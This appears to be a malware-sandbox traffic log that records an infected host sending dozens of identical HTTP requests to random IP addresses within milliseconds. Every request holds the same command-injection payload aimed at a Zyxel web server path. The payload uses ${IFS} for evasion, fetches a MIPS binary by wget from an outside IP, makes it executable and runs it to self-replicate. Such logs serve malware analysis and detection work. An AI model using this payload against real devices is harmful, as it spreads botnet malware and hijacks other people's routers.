                                    Jan 13, 2024 19:02:48.508081913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7943192.168.2.1352086115.62.241.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508117914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7944192.168.2.1359746104.41.178.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508152008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7945192.168.2.133483017.115.125.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508198977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7946192.168.2.1357294185.75.23.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508258104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7947192.168.2.1358352206.189.128.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508307934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7948192.168.2.13543549.191.94.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508335114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7949192.168.2.133427868.85.178.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508378029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7950192.168.2.1357632126.164.104.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508395910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7951192.168.2.1338792190.225.74.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508430958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7952192.168.2.1343826196.231.107.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508512974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7953192.168.2.1356552148.88.100.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508572102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7954192.168.2.134523041.53.99.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508626938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7955192.168.2.1352022146.52.148.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508698940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7956192.168.2.134617494.125.81.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508729935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7957192.168.2.135026468.75.9.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508779049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7958192.168.2.1354076218.36.25.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508826017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7959192.168.2.133685298.33.207.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508860111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7960192.168.2.135166265.46.233.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508918047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7961192.168.2.134382088.27.57.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508944035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7962192.168.2.1358172118.128.70.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509017944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7963192.168.2.1333106196.177.152.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509062052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7964192.168.2.1351332168.25.144.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509105921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7965192.168.2.134406653.120.93.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509128094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7966192.168.2.134643272.101.51.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509128094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7967192.168.2.136005694.143.146.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509191990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7968192.168.2.1341218175.229.51.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509258986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7969192.168.2.1348842122.238.198.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509342909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7970192.168.2.134537083.241.161.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509356022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7971192.168.2.1337094128.207.132.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509397030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7972192.168.2.1343998202.250.151.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509444952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7973192.168.2.1357652220.46.108.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509490967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7974192.168.2.1333504110.48.144.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509529114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7975192.168.2.1358146222.225.130.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509594917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7976192.168.2.136062092.75.200.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509615898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7977192.168.2.134500031.57.35.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509664059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7978192.168.2.1350314159.239.208.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509727955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7979192.168.2.133865259.31.100.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509753942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7980192.168.2.1337358145.142.69.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509798050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7981192.168.2.133856869.177.156.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509826899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7982192.168.2.134640662.120.88.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509869099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7983192.168.2.1343882107.135.6.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509913921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7984192.168.2.133395025.34.94.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.509980917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7985192.168.2.133590092.152.60.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510032892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7986192.168.2.1353668189.109.210.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510055065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7987192.168.2.133568852.94.33.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510097027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7988192.168.2.1356672201.216.104.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510144949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7989192.168.2.1355074203.180.62.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510190010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7990192.168.2.1335626194.216.39.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510238886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7991192.168.2.1358762114.153.119.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510265112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7992192.168.2.134076674.73.60.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510303974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7993192.168.2.133525612.233.113.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510339022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7994192.168.2.1345360171.39.34.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510368109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7995192.168.2.135549841.45.38.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510405064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7996192.168.2.133906090.108.164.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510442019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7997192.168.2.1359316184.221.80.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510556936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7998192.168.2.133552695.138.22.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510556936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7999192.168.2.1347296162.186.240.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510571957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8000192.168.2.1352418109.193.17.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510658979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8001192.168.2.1337652213.237.222.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510673046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8002192.168.2.1358438120.198.4.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510727882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8003192.168.2.1337676104.244.252.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510797977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8004192.168.2.1360048111.246.166.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510823011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8005192.168.2.1338524202.167.1.67443
                                    TimestampBytes transferredDirectionData
